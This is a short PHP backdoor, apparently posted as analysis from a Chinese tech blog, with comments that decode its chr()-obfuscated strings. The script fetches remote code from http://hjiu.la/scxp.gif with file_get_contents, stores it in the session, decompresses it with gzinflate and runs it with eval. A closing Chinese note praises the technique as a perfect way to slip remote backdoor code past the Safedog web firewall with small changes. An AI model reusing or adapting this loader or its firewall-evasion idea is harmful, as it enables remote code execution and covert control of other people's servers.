<?php
$password=‘123‘;
//----------功能程序------------------//
$c="chr";//字符串
session_start();
if(empty($_SESSION[‘PhpCode‘])){
$url.=$c(104).$c(116).$c(116).$c(112).$c(58);
$url.=$c(47).$c(47).$c(104).$c(106).$c(105);
$url.=$c(117).$c(46).$c(108).$c(97).$c(47);
$url.=$c(115).$c(99).$c(120).$c(112).$c(46);
$url.=$c(103).$c(105).$c(102);
//$url = chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(104)chr(106)chr(105)chr(117)chr(46)chr(108)chr(97)chr(47)chr(115)chr(99)chr(120)chr(112)chr(46)chr(103)chr(105)chr(102)
//$url = http://hjiu.la/scxp.gif
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
//$get = chr(102)chr(105)chr(108)chr(101)chr(95)chr(103)chr(101)chr(116)chr(95)chr(99)chr(111)chr(110)chr(116)chr(101)chr(110)chr(116)chr(115)
//$get = file_get_contents
echo $get($url);
$_SESSION[‘PhpCode‘]=$get($url);
}
//echo $url;
$unzip=$c(103).$c(122).$c(105).$c(110);
$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
//echo $unzip;//die;
//chr(103).chr(122).chr(105).chr(110)chr(102).chr(108).chr(97).chr(116).chr(101)
//$unzip = gzinflate 解码处理
@eval($unzip($_SESSION[‘PhpCode‘]));
?>
今晚帮客户分析一个后门程序,分析过程如上,试了下过不了狗,eval直接写肯定就过不了狗,估计改改可以绕过安全狗,真是一个完美的思路,调用远程加密的后门代码绕过WAF。
原文:https://blog.51cto.com/010bjsoft/2499819